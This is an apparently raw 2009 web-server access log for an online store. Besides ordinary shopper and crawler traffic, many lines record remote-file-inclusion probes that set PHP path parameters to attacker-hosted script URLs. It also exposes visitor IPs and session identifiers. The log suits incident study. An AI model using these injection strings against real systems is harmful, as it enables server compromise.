121.169.189.112 - - [25/May/2009:02:40:02 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:02 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:02 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:02 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:02 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:02 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:02 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:02 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
195.13.227.99 - - [25/May/2009:02:40:03 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
195.13.227.99 - - [25/May/2009:02:40:04 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
195.13.227.99 - - [25/May/2009:02:40:04 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
121.169.189.112 - - [25/May/2009:02:40:03 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B24496321E300BEFD05Q+M37+ENG HTTP/1.1" 200 76518 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244464015300BA6D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:05 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B24496321E300BEFD05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:05 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B24496321E300BEFD05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:05 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B24496321E300BEFD05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
195.13.227.99 - - [25/May/2009:02:40:13 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
209.59.12.99 - - [25/May/2009:02:40:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.169.189.112 - - [25/May/2009:02:40:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B244D62214300BA3D05Q+M37+ENG HTTP/1.1" 200 46456 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:19 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244D62214300BA3D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:19 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244D62214300BA3D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:26 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B244A6CC1D300C2FD05Q+M37+ENG HTTP/1.1" 200 39685 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244D62214300BA3D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:28 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244A6CC1D300C2FD05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:28 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B24446C718300B93D05Q+WSEQ(S0020):1+OKEY(A0190):001353428000S0087060+WEBKEY(A0100):PRTORD HTTP/1.1" 200 30125 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244A6CC1D300C2FD05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:29 -0400] "GET /images/printheader.jpg HTTP/1.1" 200 11345 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B24446C718300B93D05Q+WSEQ(S0020):1+OKEY(A0190):001353428000S0087060+WEBKEY(A0100):PRTORD" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
222.239.76.25 - - [25/May/2009:02:40:30 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:40:30 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.169.189.112 - - [25/May/2009:02:40:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B24436361E300D29D05Q+M37+ENG HTTP/1.1" 200 46456 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244A6CC1D300C2FD05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
89.108.85.158 - - [25/May/2009:02:40:39 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:02:40:39 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:02:40:40 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
121.169.189.112 - - [25/May/2009:02:40:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B244D63316300DB0D05Q+M37+ENG HTTP/1.1" 200 39685 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B24436361E300D29D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [25/May/2009:02:40:45 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B24446C718300B93D05Q+WSEQ(S0020):1+OKEY(A0190):001355939000S0087060+WEBKEY(A0100):PRTORD HTTP/1.1" 200 30125 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B244D63316300DB0D05Q+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
89.108.85.158 - - [25/May/2009:02:40:49 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
80.237.146.58 - - [25/May/2009:02:41:20 -0400] "GET /logs/access_log.Q109051100/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:02:41:20 -0400] "GET /logs/access_log.Q108052200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:02:41:35 -0400] "GET /logs/access_log.Q108052200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:02:41:51 -0400] "GET /logs/access_log.Q108070700%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:02:42:08 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:02:42:08 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:02:42:08 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.825"
80.237.146.58 - - [25/May/2009:02:42:21 -0400] "GET /logs/access_log.Q108052200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:02:42:23 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:02:42:23 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:02:42:23 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
80.237.146.58 - - [25/May/2009:02:42:26 -0400] "GET /logs/access_log.Q108070700%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:02:43:16 -0400] "GET /logs/access_log.Q108091400//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.30.142.171 - - [25/May/2009:02:43:23 -0400] "GET /logs/access_log.Q107070100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.130.178 - - [25/May/2009:02:43:31 -0400] "GET /logs/access_log.Q108022800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:02:43:45 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L208806444A81650031BD080+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.139.104.104 - - [25/May/2009:02:44:15 -0400] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:02:44:15 -0400] "GET /errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:02:45:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [25/May/2009:02:45:33 -0400] "GET /logs/access_log.Q108091400%20%20/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:02:46:13 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:02:46:14 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:02:46:14 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.825"
88.84.128.40 - - [25/May/2009:02:47:09 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:02:47:09 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:02:47:10 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
123.125.64.44 - - [25/May/2009:02:47:17 -0400] "GET /logs/access_log.Q108072200 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.14.5.125 - - [25/May/2009:02:47:17 -0400] "GET /errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.125.64.44 - - [25/May/2009:02:47:20 -0400] "GET /logs/access_log.Q108090300 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.143.81.26 - - [25/May/2009:02:47:21 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:02:47:21 -0400] "GET /logs/access_log.Q108091400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:02:47:21 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.14.5.125 - - [25/May/2009:02:47:22 -0400] "GET /logs/errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.14.5.125 - - [25/May/2009:02:47:22 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.14.5.125 - - [25/May/2009:02:47:22 -0400] "GET /errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.14.5.125 - - [25/May/2009:02:47:22 -0400] "GET /logs/errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.14.5.125 - - [25/May/2009:02:47:22 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.64.44 - - [25/May/2009:02:47:23 -0400] "GET /logs/access_log.Q108092000 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.44 - - [25/May/2009:02:47:26 -0400] "GET /logs/access_log.Q109031800 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
80.237.146.58 - - [25/May/2009:02:47:49 -0400] "GET /logs/access_log.Q108070700/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:02:47:56 -0400] "GET /logs/access_log.Q109051100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.825"
83.143.81.26 - - [25/May/2009:02:48:10 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:02:48:10 -0400] "GET /logs/access_log.Q108091400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:02:48:10 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:02:48:23 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0044F74B09A0C400F2DB049+WSEQ(S0060):1+OUITEM(A0200):04973401 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.14.5.125 - - [25/May/2009:02:48:42 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.14.5.125 - - [25/May/2009:02:48:49 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:02:49:01 -0400] "GET /logs/access_log.Q109051100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
83.143.81.26 - - [25/May/2009:02:49:19 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:02:49:19 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:02:49:19 -0400] "GET /logs/access_log.Q108091400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:02:50:04 -0400] "GET /logs/access_log.Q108070700/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:02:50:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [25/May/2009:02:50:23 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:50:45 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:50:45 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:50:45 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:50:49 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:50:49 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:50:49 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:02:51:52 -0400] "GET /logs/access_log.Q109051100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.825"
212.33.197.126 - - [25/May/2009:02:52:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B214C6021830066DD05P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
88.84.128.40 - - [25/May/2009:02:53:48 -0400] "GET /logs/access_log.Q109051100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
83.143.81.26 - - [25/May/2009:02:54:00 -0400] "GET /logs/access_log.Q108060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:02:55:04 -0400] "GET /logs/access_log.Q109050900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:02:55:04 -0400] "GET /logs/access_log.Q108091400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:02:55:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.12 - - [25/May/2009:02:55:38 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.12 - - [25/May/2009:02:55:39 -0400] "GET /?sourcedir=http://www.asd.org.br/sex.txt?? HTTP/1.1" 200 409 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.14.5.125 - - [25/May/2009:02:56:29 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.12 - - [25/May/2009:02:56:34 -0400] "GET /?sourcedir=http://www.asd.org.br/sex.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
70.38.31.50 - - [25/May/2009:02:56:56 -0400] "GET //shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
70.38.31.50 - - [25/May/2009:02:56:56 -0400] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
70.38.31.50 - - [25/May/2009:02:56:56 -0400] "GET /logs//shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
212.14.5.125 - - [25/May/2009:02:57:08 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://geocities.com/coreto3/1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
